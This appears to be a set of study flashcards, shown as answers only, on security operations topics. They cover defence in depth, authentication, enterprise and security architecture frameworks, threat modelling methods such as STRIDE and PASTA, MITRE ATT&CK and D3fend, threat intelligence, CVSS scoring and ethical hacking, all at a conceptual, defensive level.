4 SECURITY OPERATIONS Flashcards

Question

Security layers Host security

Answer 1

host security, which involves protecting individual systems and servers within the network;

Answer 2

application security, which involves securing applications and ensuring they are free from vulnerabilities

Answer 3

data security, which involves protecting stored and transmitted data.

Answer 4

models include: DEFENCE IN DEPTH (layered security approach) ZERO TRUST MODEL (threats exist inside/outside network, no one trusted by default) LEAST PRIVILEGE (limits access rights bare min) SEPARATION OF DUTIES (dividing responsibilities to prevent fraud/errors)

Answer 5

FIREWALLS INTRUSION DETECTION/PREVENTION MFA ENCRYPTION SIEM

Answer 6

firewalls, which prevent unauthorised access to or from a private network

Answer 7

security policies IR plans DRPS BCPS

Answer 8

include security policies, which are formalised rules and standards to guide the secure handling of data and resources;

Answer 9

IR plans, which involve procedures for detecting, responding to and recovering from security incidents

Answer 10

disaster recovery plans (DRPs), which include strategies for recovering data and systems after a catastrophic event;

Answer 11

business continuity plans (BCPs), which ensure that critical organisation functions continue during and after a disaster.

Answer 12

involves risk assessment, identifying and evaluating potential risks and vulnerabilities; risk mitigation, implementing measures to reduce risks to an acceptable level; and continuous monitoring, ongoing monitoring of the IT environment to detect and respond to threats in real-time.

Answer 13

Compliance and governance involve regulatory compliance, ensuring that security practices comply with laws and regulations (e.g. GDPR, Sarbanes–Oxley Act, PCI DSS); and governance frameworks, using standards such as NIST, CIS18 and ISO 27001 to guide and improve security practices. Ultimately a well-designed system and architecture helps an organisation protect itself and reduce harm, while giving a level of assurance that all controls and security services work as designed to protect sensitive data and reduce or prevent any loss from an incident.

Answer 14

intrusion detection and prevention systems, which monitor network traffic for suspicious activity;

Answer 15

encryption, which protects data by transforming it into an unreadable format;

Answer 16

MFA, which adds an additional layer of security by requiring two or more verification factors;

Answer 17

SIEM, which provides real-time analysis of security alerts generated by network hardware and applications.

Answer 18

* Reviews high- & low-level solution diagrams for security compliance * Suggests secure hardware/software during design phase * Evaluates new technologies against security standards * Supports working groups with security input * Designs standalone security elements outside of solutions * Alternates between cyber engineering and information security roles

Answer 19

Multiple layers of defence, each layer barrier to access slowing/stopping policy, physical security measures, access control and encryption of data at rest and in motion. *look inwards/outwards to protect against the insider threat.

Answer 20

* **Policy and procedure** – Governance and operational guidelines * **Physical security** – Protection of physical assets and infrastructure * **Network security** – Safeguards for data in transit and network access * **Host security** – Security measures on individual devices and servers * **Application and data security** – Protection of software and sensitive data

Answer 21

more recent, due to need to consider all connections to any networked system * Focuses on the full extent of network connectivity * Addresses complexity from connections to suppliers, customers, remote sites, and homeworkers * Highlights the importance of securing every part of the network * Emphasises that attackers target the weakest link in the network * Notes that modern malware can traverse networks and exploit internal trust

Answer 22

stands for identification and authentication

Answer 23

1) IDENTIFICATION through unique username 2) AUTHENTICATION from something they know to compare, providing access

Answer 24

the user must tell the system who they claim to be (identification) by entering a unique username.

Answer 25

The system will then challenge them to prove that identity by providing some form of knowledge that can only be known, or possessed, by the individual that they have claimed to be (authentication). The system compares the data it receives against a known value it holds and, if they match, it provides access to the system.

Answer 26

provides form of DoS attack- disrupt availability through lockout

Answer 27

password grabbers/crackers easy, social engineering, fairly weak security=don't put faith in passwords

Answer 28

user must enter a password and something else as well before the system accepts their claimed identity. e.g. token RSA,

Answer 29

he traditional type is the size of a key fob and has a liquid crystal display. This displays a six-digit number that changes every 60 seconds. The values displayed are based on an algorithm and secret key value that is known only to the organisation that owns the system. The sequence of numbers displayed is not predictable and it has resisted attempts to break it for many years. The sequence for each user is different, so they cannot be interchanged with other users. The user is asked to enter a secret personal identification number (PIN), supposedly known only to them, and then the value showing on the token. This is compared to the value calculated by the authentication server. If the values match, access is granted. downsides: cost, battery limits, OTPS cheaper

Answer 30

use of a characteristic of an individual that is unique to that person, either anatomical (e.g. fingerprints or facial recognition), behavioural (e.g. signature) or a combination of both aspects (e.g. voice).

Answer 31

* **Advantages**: * Free with every user and hard to steal or lose * Self-repairing (though wear/damage can occur in manual trades) * Requires physical presence for identification * Reduces reliance on passwords * Cannot be written down or easily shared * **Considerations**: * Requires reliable sensors to detect and prevent spoofing * Needs capital investment and integration into security systems * Increasingly supported by modern endpoint devices

Answer 32

The Open Group Architecture Framework (TOGAF) is used for enterprise architecture. It provides an approach for designing, planning, implementing and governing an enterprise information technology architecture.

Answer 33

* **Architecture Development Method (ADM)** * **ADM Guidelines and Techniques** * **Architecture Content Framework** * **Enterprise Continuum and Tools** * **TOGAF Reference Models** * **Architecture Capability Framework**

Answer 34

**Architecture Development Method (ADM)** * Core process of TOGAF * Step-by-step approach to developing enterprise architecture * Includes phases: Preliminary, Vision, Business, IS, Technology, Opportunities, Migration, Governance, Change Management

Answer 35

**ADM Guidelines and Techniques** * Best practices and tools to support ADM * Tailors ADM to specific needs * Supports styles like service-oriented and security architectures

Answer 36

Architecture content framework: Provides a detailed model for creating architecture artefacts, deliverables and the relationships between them. It includes the Architecture Content Metamodel, which defines the structure of architecture components and their relationships

Answer 37

A classification mechanism for architecture and solution artefacts, providing a repository for reusable artefacts. It includes the Architecture Continuum, which describes generic to specific solutions, and the Solutions Continuum, which focuses on implementation.

Answer 38

TOGAF reference models: Includes standard reference models such as the TOGAF Foundation Architecture (Technical Reference Model) and the Integrated Information Infrastructure Reference Model. These models provide foundational building blocks and common services necessary for enterprise architecture.

Answer 39

Architecture capability framework: Focuses on establishing and operating an architecture function within an organisation. It addresses aspects like governance, skills, roles and responsibilities needed to manage and sustain the architecture practice effectively.

Answer 40

The Sherwood Applied Organisation Security Architecture * Risk-driven enterprise security architecture framework * Developed in 1995 by John Sherwood, Andy Clark, and David Lynas * Aligns IT security with organisational objectives * Supports structured, business-aligned security design

Answer 41

* **Contextual layer** Requirements and environment: * **Conceptual layer** – High-level security concepts * **Logical layer** – Security architecture and models: * **Physical layer** – Technology-specific solutions: * **Component layer** – Configuration and implementation: * **Operational layer** – Day-to-day security operations:

Answer 42

* Defines organisational context, vision, goals, and objectives * Identifies stakeholders and their security needs * Maps organisational processes and environments

Answer 43

* Develops high-level security concepts * Aligns with organisational goals and objectives * Outlines key security concepts and principles

Answer 44

* Creates detailed security models and architecture * Specifies required security services and functions * defines security services and functions without delving into specific technologies

Answer 45

* Translates logical models into specific technologies * Defines technical and physical controls * Selects products and implementation methods

Answer 46

* Focuses on detailed design and configuration * product settings and integration details * Implements physical layer components

Answer 47

* Covers day-to-day security operations * Includes procedures, policies, and practices * Ensures monitoring, maintenance, and improvement

Answer 48

The open security architecture (OSA) framework designing/implementing security systems FLEXIBLE, ADAPTABLE for SPECIFIC REQUIREMENTS can be used alongside others e.g. SABSA, guidance from ISO 27001 and NIST CSF while ongoing monitoring/testing

Answer 49

**Pattern-based approach** – Reusable security patterns and best practices adaptable for common challenges **Community driven** Developed/maintained by global security professionals /perspectives **Documentation and guidance** detailed diagrams, examples, aid implementation **Technology agnostic** Flexible across environments; promotes interoperability and scalability

Answer 50

to identify, communicate and understand threats and mitigations often in security use, initial planning or design create a THREAT MODEL across various domains (software, systems, networks, distributed systems, IoT, ICSs, processes)

Answer 51

A **threat model ** provides a **systematic depiction** of all the information that impacts the security of a system or software. Security view of the application identifies risks-> prioritises-> cost-benefit analysis of risk treatment before design/new solution e.g. flooding, earthquakes, loss of power and system outages as well as cyber-attack

Answer 52

Attack trees AND/OR logic STRIDE PASTA Trike VAST MITRE ATT&CK MITRE D3fend

Answer 53

decision tree diagram root/trunk/base = **attackers primary goal** branches=**ways of reaching**, sub-threats and **attack vectors** (node=specific threat) HIERARCHICAL STRUTURE VISUALISE more than one path to intended goal- clear for stakeholders which paths need attention THREAT DECOMPOSITION into finer details/path using SYSTEMATIC APPROACH

Answer 54

**Define the asset or goal**: identifying the primary asset or security goal to be protected. **Identify threats**: List potential threats to the asset or goal. **Decompose threats**: Break down each threat into sub-threats and **attack vectors**, creating branches for each. **AND/OR logic** **Analyse and prioritise**: Assess the likelihood and impact (**risk assessment**) of each threat and prioritise them for **mitigation strategies**.

Answer 55

To gain access to a system, an attacker could: Guess the passwordORexploit a vulnerability. Either one alone is sufficient vs o bypass a secure door, an attacker must: Steal an access cardANDclone the fingerprint. Both are require

Answer 56

Nodes (potential threats) can be AND/OR conditions AND: all sub-threats must occur to realise parent OR: any can realise the parent threat

Answer 57

**Malware ** ├── Malware is run as admin │ └── Malware is found └── Malware is run as user ├── User is deceived └── Malware infects software

Answer 58

used to identify computer security threats SIMPLE/EASY CLEAR/STRUCTURED methodology for variety of systems/services for modelling threats and impacts Primary goal identify threats/vulnerabilities in software development lifecycle

Answer 59

S – Spoofing T – Tampering R – Repudiation I – Information Disclosure D – Denial of Service E – Elevation of Privilege

Answer 60

Spoofing Authenticity *pretending to be someone/something other than yourself*

Answer 61

Tampering Integrity *Modifying something on disk, network, memory or elsewhere*

Answer 62

Repudiation Non-repudiability Claiming that you were not responsible or did not do something. Can be honest or false

Answer 63

Information disclosure Confidentiality *Someone obtaining information they are not authorised to access*

Answer 64

Denial of service Availability *Exhausting resources needed to provide service.*

Answer 65

Elevation of privilege Authorisation *Someone is allowed to do something they are not authorised to do.*

Answer 66

Spoofing Threat: An attacker impersonates a legitimate user to gain unauthorised access. Example scenario: An attacker uses stolen credentials to log in as a patient. Mitigation strategies: Implement MFA. Use strong password policies and encourage regular password changes. Monitor for unusual login patterns and alert users of suspicious activity.

Answer 67

Tampering Threat: An attacker modifies data in transit or at rest. Example scenario: An attacker intercepts and alters prescription information between the client and server. *Mitigation strategies*: Use transport layer security/secure sockets layer (TLS/SSL) to encrypt data in transit. Implement data integrity checks (e.g. digital signatures). Store sensitive data in an encrypted format in the database. Use hashing and salting for passwords

Answer 68

Repudiation Threat: A user denies performing an action without a way for the system to prove otherwise. Example scenario: A patient denies having requested a medication refill, claiming it was a system error. Mitigation strategies: Implement comprehensive logging for all user actions. Use non-repudiation techniques like digital signatures. Ensure logs are tamper-proof and securely stored.

Answer 69

Information disclosure Threat: Sensitive information is exposed to unauthorised individuals. Example scenario: A vulnerability in the application allows an attacker to access other patients’ medical records. Mitigation strategies: Enforce strict access control policies. Use data encryption both in transit and at rest. Perform regular security audits and vulnerability assessments. Implement least privilege principles for database access.

Answer 70

*Denial of service* *Threat*: An attacker disrupts the service, making it unavailable to legitimate users. Example scenario: An attacker floods the server with requests, causing it to crash and become unavailable. *Mitigation strategies*: Implement rate limiting and throttling to control request rates. Use web application firewalls (WAFs) to detect and block malicious traffic. Deploy redundancy and load balancing to handle high traffic volumes. Monitor network traffic for unusual patterns.

Answer 71

Elevation of privilege **Threat**: An attacker gains higher privileges than intended. **Example scenario**: A regular user exploits a vulnerability to gain administrative access. **Mitigation strategies**: Implement proper RBAC. Perform regular security code reviews and penetration testing. Apply security patches and updates promptly. Use principle of least privilege for all users and services.

Answer 72

STRIDE became part of Microsoft’s Security Development Lifecycle (SDL), a process designed to integrate security into every phase of software development. The SDL mandates threat modelling as a key practice. STRIDE provides a clear and structured methodology for identifying and addressing security concerns.

Answer 73

Process for Attack Simulation and Threat Analysis threat model identifying, analysing and mitigating security threats views as attacker perspective **risk-centric**, focuses on aligning security activities with organisation objectives through assessing the impact of threats on organisational risks/priorities **stages**, **simulations**, **impact focus**, **iterative**

Answer 74

1. *DO* – Define objectives (organisation/security) 2. *DTS* – Define technical scope (system architecture/assets) 3. *ADA* – Application decomposition & analysis (components, data flows) 4. *TA* – Threat analysis (& attack vectors) 5. *WVA* – Weakness & vulnerability analysis 6. *AMS* – Attack modelling & simulation (understand potential impact/exploit paths) 7. *RIA* – Risk & impact analysis (prioritise mitigation strategies)

Answer 75

Uses simulated attacks to model real-world threat scenarios, helping to identify potential weaknesses and understand the impact of various attack vectors

Answer 76

Emphasises understanding the impact of threats on organisation processes and assets, ensuring that security efforts are aligned with organisation priorities.

Answer 77

Encourages regular updates and refinements to the threat model to adapt to evolving threats and changes in the organisation or technical environment.

Answer 78

**stage 1** DO **Organisation objectives**: Provide a secure platform for online shopping, ensure customer trust and protect sensitive data. **Security objectives**: Prevent unauthorised access, safeguard customer data, ensure transaction integrity and comply with data protection regulations.

Answer 79

Stage 2: Definition of the technical scope (DTS) Application scope: The ecommerce website, including the web server, database, payment gateway and third-party integrations. **Technologies used**: Web server (e.g. Apache), database (e.g. MySQL), front-end framework (e.g. React), back-end language (e.g. Node.js), payment processors (e.g. PayPal, Stripe). **Network infrastructure**: Load balancers, firewalls, TLS for secure communication.

Answer 80

**Stage 3: Application decomposition and analysis (ADA)** **Components**: User authentication module, product catalogue, shopping cart, payment processing, order management, user profile management. **Data flows**: User inputs credentials, searches for products, adds items to the cart, proceeds to checkout, enters payment details, confirms order, receives order confirmation. **Entry points**: User login page, product search, add to cart, checkout page, payment gateway, application programming interfaces (APIs) for third-party services. **Trust boundaries**: User device, web server, application server, database server, third-party payment processors.

Answer 81

**Stage 4: Threat analysis (TA)** Threats: Unauthorised access: Brute force attacks, credential stuffing. Data breaches: Structured Query Language (SQL) injection, exposed APIs. Financial fraud: Credit card fraud, unauthorised transactions. DoS/DDoS attacks: Overloading the server to disrupt service. Cross-site scripting (XSS): Injecting malicious scripts via input fields. Cross-site request forgery (CSRF): Unauthorised actions on behalf of authenticated users.

Answer 82

Stage 5: Weakness and vulnerability analysis (WVA) **Vulnerabilities:** Weak password policies: Allowing easily guessable passwords. Unpatched software: Outdated libraries or frameworks. Misconfigured security settings: Improperly configured TLS. Lack of input validation: No sanitisation of user inputs. Exposed APIs: Publicly accessible without proper authentication. **Tools for analysis:** Vulnerability scanners (e.g. Burp, Rapid 7, Nessus), code review, penetration testing

Answer 83

**Stage 6: Attack modelling and simulation (AMS)** **Attack scenarios:** SQL injection attack: An attacker exploits a vulnerability in the login form to access the database. Brute force attack: An attacker attempts to gain access by trying numerous username-password combinations. DDoS attack: Attackers overwhelm the server with traffic, causing downtime. **Simulation**: Conduct penetration tests simulating these attacks to understand their impact and likelihood.

Answer 84

**Stage 7: Risk and impact analysis (RIA)** **Risk assessment:** Evaluate the likelihood and impact of identified threats. SQL injection: High impact, high likelihood without proper sanitisation. Brute force: Medium impact, medium likelihood mitigated by account lockout mechanisms. DDoS: High impact, varying likelihood depending on mitigation measures like CDNs. **Risk mitigation**: Prioritise remediation efforts based on risk assessment. Mitigations: Implement strong password policies and MFA. Regularly update and patch software. Configure security settings correctly. Validate and sanitise all user inputs. Secure APIs with proper authentication and authorisation mechanisms. Use WAFs and DDoS protection services.

Answer 85

**Stage 7: Risk and impact analysis (RIA)** **Risk assessment:** Evaluate the likelihood and impact of identified threats. SQL injection: High impact, high likelihood without proper sanitisation. Brute force: Medium impact, medium likelihood mitigated by account lockout mechanisms. DDoS: High impact, varying likelihood depending on mitigation measures like CDNs. **Risk mitigation**: Prioritise remediation efforts based on risk assessment. Mitigations: Implement strong password policies and MFA. Regularly update and patch software. Configure security settings correctly. Validate and sanitise all user inputs. Secure APIs with proper authentication and authorisation mechanisms. Use WAFs and DDoS protection services.

Answer 86

open source framework for security auditing from risk management perspective *uses threat models to manage risk rather than elimination of risk* ACCEPTABLE level of risk for different assets breaks down into system asset and system user Trike indicates user level of access to each access and permissions (create, read, update and delete). **Role-based approach**- assigns roles to participants **structured** systematic process **iterative**

Answer 87

Trike integrates risk management principles to prioritise threats based on their potential impact and likelihood. It helps in making informed decisions about which threats to address first.

Answer 88

Requirements model: Defines the security requirements of the system, often based on the goals and assets that need protection. **Implementation model**: Describes the system architecture and how data flows through the system. This includes identifying entry points, data flows, trust boundaries and actors. **Threat model**: Maps threats to the system based on the identified requirements and implementation details, helping to visualise potential attack vectors and vulnerabilities.

Answer 89

Identifying and cataloguing assets. Defining security requirements. Mapping out the system architecture. Identifying and classifying threats. Assessing risks and prioritising them. Developing mitigation strategies.

Answer 90

VAST (visual, agile and simple threat) is a threat modelling methodology that emphasises simplicity, agility and visualisation in understanding and mitigating security threats.

Answer 91

**VAST Threat Modelling – Key Features** * *Visual representation* * *Agile approach* * *Simplicity* * *Structured methodology* * *Integration with development process*

Answer 92

VAST utilises visual diagrams and charts to map out the system architecture, data flows, trust boundaries and potential attack vectors. This visual representation helps stakeholders easily grasp the security posture of the system.

Answer 93

VAST integrates with Agile development practices, allowing threat modelling to be conducted iteratively and continuously throughout the development lifecycle. It supports quick adjustments and updates as the system evolves.

Answer 94

Simplicity: VAST aims to simplify the threat modelling process by focusing on the most critical threats and vulnerabilities. It prioritises practicality and actionable insights, ensuring that security efforts are targeted where they can have the most impact.

Answer 95

Despite its emphasis on simplicity, VAST follows a structured methodology that includes steps such as: Asset identification: Identifying and categorising the assets (e.g. data, systems) that need protection. Threat identification: Identifying potential threats and attack vectors that could exploit vulnerabilities in the system. Risk assessment: Assessing the likelihood and impact of identified threats to prioritise mitigation efforts. Mitigation strategies: Developing and implementing strategies to mitigate identified risks, considering both technical and procedural controls.

Answer 96

VAST encourages collaboration between security teams, developers and other stakeholders to ensure that threat modelling is integrated seamlessly into the development process. This alignment helps in addressing security concerns early and continuously, improving the system’s security posture.

Answer 97

(**adversarial tactics, techniques and common knowledge**) framework is a comprehensive **matrix of tactics and techniques** used by threat actors in cybersecurity. SYSTEMATIC APPROACH for understanding, analysing and improving an organisation’s defensive capabilities against cyber threats. ENCYCLOPEAEDIA OF TACTICS/TECHNIQUES IoCs or MO

Answer 98

threat actor’s modus operandi (MO), which is simply a person’s manner of working.

Answer 99

**Tactics** technical objectives attackers are trying to achieve, (e.g. gaining initial access, maintaining persistence or establishing command and control.) **Techniques** How, methods attackers use to achieve a tactic, sub-techniques **Procedures ** actions detail how tactics used using techniques

Answer 100

describe the technical objectives attackers are trying to achieve e.g. gaining initial access, maintaining persistence or establishing command and control. WHAT attackers will use multiple tactics to achieve their objective.

Answer 101

* *Initial Access* – Gain foothold in system * *Execution* – Run adversary-controlled code * *Persistence* – Maintain access over time * *Privilege Escalation* – Gain higher-level permissions * *Defence Evasion* – Avoid detection * *Credential Access* – Steal usernames/passwords * *Discovery* – Learn about system/network * *Lateral Movement* – Move through network * *Collection* – Gather information * *Exfiltration* – Steal data * *Command & Control* – Communicate with compromised systems

Answer 102

is the ‘How’, and describes the methods used by the attackers to achieve a tactic. All tactics have multiple techniques, and these are broken down into sub-techniques. *Phishing, for example, has the sub-technique of spear phishing.* phishing (initial access); PowerShell (execution); registry Run keys / Startup folder (persistence); credential dumping (credential access); pass-the-hash (lateral movement); data encrypted (exfiltration).

Answer 103

is the set of actionable, carefully crafted and precise actions that detail how tactics are used using techniques. These are the specific implementations or procedures of the techniques used by threat actors. They include detailed information about how these techniques have been observed in real-world scenarios.

Answer 104

Threat intelligence: Helps organisations understand behaviours of threat actors by providing detailed information about their TTPs. Detection and response: Aids in identifying gaps in existing security controls and improving detection and response strategies. Adversary emulation: Facilitates *red teaming* and penetration testing by providing a structured approach to simulate realistic attack scenarios. Security operations: Enhances the capabilities of SOCs in monitoring and analysing potential threats.

Answer 105

**Mapping incidents**: Organisations can map security incidents to specific tactics and techniques in the ATT&CK framework to understand the methods used by attackers. **Developing controls**: By understanding the techniques, organisations can develop specific controls and defences to mitigate these threats. **Training and awareness: ** Helps in training security employees on various attack vectors and their mitigation strategies.

Answer 106

Tactic: Initial access. Technique: Spear-phishing attachment. Procedure: The attacker sends an email with a malicious attachment to a specific target within the organisation. Defence: The organisation can implement email filtering solutions, conduct user training and set up detection mechanisms for known phishing techniques.

Answer 107

Another way to explain Mitre ATT&CK may be with a real-world example from my time as a police officer. One evening, I was sent to investigate two burglaries. Each of these burglaries saw the offender gain entry to the rear of the property by smashing a rear patio door then stealing mainly high-value electrical items and jewellery. A white BMW coupe was also seen in the area on both occasions. A few months later I was working in a different area and attended another two burglaries with the same MO with a white BMW coupe seen in the area. Therefore, it was highly likely these two sets of burglaries were conducted by the same people due to the TTPs.

Answer 108

Attack Lifecycle Overview; Table maps cyber techniques to attack stages; Stages: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation; Each stage lists example techniques used by attackers. with a number of techniques e.g 10 Reconnaissance Techniques; Active Scanning; Gather Host, Identity, Network, Org Info; Phishing for Info; Search Closed Sources, Technical Databases, Open Websites, Victim Sites.

Answer 109

MITRE ATT&CK enables overlaying TTPs onto a matrix Enterprise, Mobile or an ICS matrix follow attack through with a threat or techniques e.g.T1566 Phishing, which has four sub-techniques of T1566.001 Spear phishing attachment, T1566.002 Spear phishing link, T1566.003 Spear phishing via service and T1566.004 Spear phishing voice.

Answer 110

T1059: Command & Scripting Interpreter; Executes commands/scripts; 52.3% T1027: Obfuscated Files/Info; Hides code/data; 46.5% T1083: File & Directory Discovery; Lists files/folders; 38.6% T1021: Remote Services; Uses remote access tools; 37.3% T1082: System Info Discovery; Gathers system details; 37.1% T1070: Indicator Removal; Deletes logs/traces; 35.1% T1071: App Layer Protocol; Communicates via common protocols; 34.0% T1033: System Owner/User Discovery; Finds user info; 31.7% T1140: Deobfuscate/Decode Info; Decodes hidden data; 31.5% T1190: Exploit Public-Facing App; Attacks exposed services; 28.7%

Answer 111

complements MITRE ATT&CK framework D3fend provides a structured knowledge base of defensive techniques and countermeasures to help defend against these threats still evolving/in development

Answer 112

MITRE D3fend complements MITRE ATT&CK framework ATT&CK focuses on categorising adversary TTPs, which can be used to compromise an organisation, D3fend provides a knowledge base of defensive techniques and countermeasures to help defend against these threats

Answer 113

Model Employed to implement security, vulnerability, threat and risk analysis upon IT systems. Harden Employed to increase protection against system or network exploitation. Detect Employed to detect unauthorised access and unusual activities on the computer and network. Isolate Employed to create physical barriers in the system to prevent attackers from gaining further access to the network. Deceive Employed to trick the attacker to gain access to an observed or controlled environment. Evict Employed to eradicate the attacker’s persistence from a system and network.

Answer 114

Defensive focus, Knowledge base structure, Defensive techniques, Mapping to ATT&CK, Use cases and examples, Tool-agnostic, Community and collaboration

Answer 115

Defensive focus: Unlike ATT&CK, which is oriented towards understanding and categorising attacker behaviours, D3fend is designed to guide cybersecurity professionals in implementing effective defensive measures. It serves as a counterpart to ATT&CK, enabling a more comprehensive cybersecurity strategy.

Answer 116

Knowledge base structure: D3fend organises its information into a structured knowledge base, detailing various defensive techniques. These techniques are mapped to the corresponding attack techniques in the ATT&CK framework, providing a clear line of sight from potential threats to defensive actions.

Answer 117

Defensive techniques: The framework includes a wide range of defensive techniques, such as network segmentation, encryption, anomaly detection and access controls. Each technique is thoroughly documented, including its purpose, implementation considerations and related techniques.

Answer 118

Mapping to ATT&CK: One of the significant features of D3fend is its mapping to the ATT&CK framework. This mapping helps to identify which defensive measures can be used to counter specific adversarial techniques listed in ATT&CK, enabling a targeted and strategic approach to cybersecurity

Answer 119

Use cases and examples: D3fend provides practical examples and use cases that illustrate how the defensive techniques can be applied in real-world scenarios. This helps cybersecurity practitioners to understand the practical implications and benefits of each technique.

Answer 120

Tool-agnostic: The framework is designed to be tool-agnostic, meaning it does not prescribe specific security products or vendors. Instead, it focuses on the principles and strategies that can be implemented using a variety of tools and technologies.

Answer 121

Community and collaboration: Similar to ATT&CK, D3fend encourages collaboration within the cybersecurity community. By sharing knowledge and experiences, practitioners can contribute to the continuous improvement and evolution of the framework.

Answer 122

process of collecting, analysing and disseminating information about potential or current threats to organisation security. INSIGHT INTO TTPs of cyber attackers MOTIVES

Answer 123

Tactics Techniques procedures used to achieve their objectives

Answer 124

By understanding these elements, organisations can proactively anticipate and mitigate cyber risks, enhancing their overall security posture.

Answer 125

Threat intelligence is typically delivered through reports, alerts and API feeds, helping security teams prioritise resources and respond effectively to threats.

Answer 126

An effective security strategy involves multiple layers, enabling security teams to predict and understand cyber threats targeting an organisation. By anticipating potential attackers and their methods, security teams can prioritise resources and respond effectively to cyber-attacks

Answer 127

provides the crucial foresight with timely, comprehensive and contextually rich threat intelligence delivered in formats that can be used by enterprise systems **API feeds** and security staff **alerts, reports** SOC managers/analysts can better prioritise and respond to threats using **threat intelligence reports**

Answer 128

Falcon Intelligence offers insights and IoCs through an all-source methodology of intelligence gathering, analysis and dissemination. CrowdStrike’s global threat intelligence team employs various collection methods (human intelligence, signals intelligence, open-source intelligence, the dark web, etc.) to gather, analyse and report on more than 90 threat actors operating worldwide

Answer 129

Other threat intelligence frameworks include MISP (malware information sharing platform), NormShield, Yeti and ThreatStream.

Answer 130

SOC managers and intelligence analysts can better prioritise and respond to threats using threat intelligence reports. These reports include specific information about threat actors, their TTPs and the industry sectors they target.

Answer 131

Data collection → Processing → Analysis → Intelligence dissemination → Law enforcement decision/action→ Planning & direction

Answer 132

strategy integrates knowledge of **potential threats and adversarial behaviours** INTO **defensive planning and operations** uses intelligence about **specific** threats, e.g. TTPs to inform/enhance **defensive ** measures organisation understands HOW adversaries operate = prioritise defences + anticipate potential attacks and respond more effectively strategy can use MITRE ATT&CK framework to map out known threats/responses

Answer 133

use and management of information to gain a competitive advantage over an adversary. target the information systems and infrastructure of an opponent both offensive & defensive intelligence +surveillance = predict strategies

Answer 134

cyber warfare Electronic warfare Psychological operations (PsyOps) Information operations (InfoOps)

Answer 135

which involves attacks on computer networks such as hacking, deploying malware and conducting DoS attacks to disrupt, disable or control the opponent’s information systems.

Answer 136

uses the electromagnetic spectrum (radio waves, microwaves, etc.) to intercept, jam or deceive enemy communications and radar systems.

Answer 137

disseminate propaganda, misinformation and psychological tactics to influence the perceptions, emotions and decision-making processes of the adversary and its populace

Answer 138

Information operations (InfoOps) involve co-ordinated actions to gather, distribute and manage information to disrupt, corrupt or usurp adversarial decision-making while protecting information and information systems.

Answer 139

Intelligence and surveillance are crucial for gathering and analysing information to understand and predict the actions and strategies of opponents, thereby enabling informed decision-making.

Answer 140

Social media manipulation involves using social media platforms to spread false information, create fake accounts and influence public opinion to achieve strategic objectives. Information warfare can be conducted by nation states, non-state actors and individuals, playing a crucial role in modern conflicts and geopolitical strategies by using the interconnected nature of information systems and the widespread availability of digital.

Answer 141

LOW RISK e.g. a 20cm hole in a perimeter fence. Is there a risk a person could gain access through a 20cm hole? To gain access, the hole would need to be big enough for a person to get through, which could make it high risk. To make the hole bigger, it either grows bigger or is exploited by cutting a bigger hole LOW RISK = MONITOR HIGH RISK= ACT NOW!

Answer 142

Common Vulnerabilities and Exposures (CVE) ID numbers for found vulnerabilities [year][incremental #] scored using CVSS 0-10

Answer 143

lists all found vulnerabilities with an ID number. helps identify vulnerabilities

Answer 144

Each vulnerability is given a score using a scoring system called Common Vulnerability and Scoring System (CVSS). Version 3.1 uses a scoring system to calculate a score of 0–10. This score can then be placed into: None (0); Low (0.1–3.9); Medium (4.0–6.9); High (7.0–8.9); Critical (9.0–10).

Answer 145

granular metrics improve understanding and technical characteristics of vulnerabilities designed to give more precise and context-aware scores instead of one score breaks down into layers B BT BE BTE for better understanding

Answer 146

CVSS-B: CVSS base score CVSS-BT: CVSS base + threat score CVSS-BE: CVSS base + environmental score CVSS-BTE: CVSS base + threat + environmental score

Answer 147

the exploitation requirements for attackers; the level of access provided upon successful exploitation; and the overall impact on the organisation considering specific architecture and defences.

Answer 148

CVSS 4.0 helps you ask: How easy is it to exploit? What access does it give? How does it affect our setup? Are attackers actively using it? (compared to 3.1; detailed insight/scores; enhanced granularity in environmental scores; accuracy, relevancy; clearer guidelines)

Answer 149

CVSS 3.1 will continue, and you will start to see CVSS 4.0, 3.1 and 2.0 scores listed together on vulnerability websites such as NVD.

Answer 150

vulnerabilities exploited due to **older technologies** *Microsoft Access 2003 (CVE-2008-2463), Microsoft Windows Server 2016 (CVE-2017-0144), and Telerik (CVE-2019-18935).*

Answer 151

CVE-2023-34362 MOVEit Transfer **9.8 Critical** CVE-2022-21587 Oracle Web Application Integrator 9.8 Critical CVE-2023-7102 Barracuda ESG 9.8 Critical

Answer 152

What happened? A serious SQL injection **vulnerability** was found in MOVEit Transfer, a file transfer web app. This flaw lets an attacker send malicious commands to the database without logging in. Why is it dangerous? The attacker can see, change, or delete data in the database. It affects many versions, including older ones. It was actively exploited in May–June 2023. Attackers can use HTTP or HTTPS to carry out the attack. **What to do?** Update to one of the safe versions listed (e.g. 2021.0.6 or newer). Older versions are vulnerable.

Answer 153

What happened? A flaw in Oracle’s desktop upload tool lets attackers take control of the application without logging in. How? Just by sending malicious data over the network (HTTP), the attacker can exploit the vulnerability. Who’s affected? Versions 12.2.3 to 12.2.11 of Oracle E-Business Suite. What to do? Apply Oracle’s security patch for this vulnerability.

Answer 154

What happened? A third-party library used by Barracuda’s email security appliance had a flaw that allowed parameter injection. What does that mean? Attackers could sneak malicious input into the system, potentially leading to unauthorised access or control. Who’s affected? Versions from 5.1.3.001 to 9.2.1.001. What to do? Barracuda removed the vulnerable logic – update to a safe version.

Answer 155

🔍 Scan Overview Scan Type: Basic Network Scan Scanner: Local Scanner Duration: 10 minutes (from 10:01 AM to 10:11 AM on 17 Oct 2020) Total Vulnerabilities Found: 72 Remediations Suggested: 4 ⚠️ Vulnerability Breakdown Critical: SSL (Multiple Issues) – 3 instances across 3 hosts High: Bind Shell Backdoor Detection NFS Exported Share Info Disclosure rexec Service Detection Unix OS Version Detection – 2 instances UnrealIRCd Backdoor Detection Medium: VNC Server Unencrypted Password – 3 instances DNS (Multiple Issues) ISC BIND Multiple Issues SSL (Multiple Issues) Low: Apache Tomcat (Multiple Issues) Web Server (Multiple Issues) Informational: login Service Detection

Answer 156

known as penetration testing or white-hat hacking, is the practice of intentionally probing computer systems, networks or web applications to discover and fix security vulnerabilities same tools as malicious hackers with permission/aim of improving security

Answer 157

**Authorisation** **Scope** **Objective** **Techniques** Reconnaissance Weaponisation Delivery Exploitation Installation Command and Control (C2) Actions on Objectives **Reporting**

Answer 158

always have permission before ensures legal avoid unintended harm RULES OF ENGAGEMENT specifics what,when,how tested

Answer 159

defined scope for testing outlines what systems, networks or applications can be tested, the types of tests to be performed and the duration of the tests

Answer 160

primary goal=identify security weaknesses that could be exploited by malicious hacker to strengthen security measures of tested systems

Answer 161

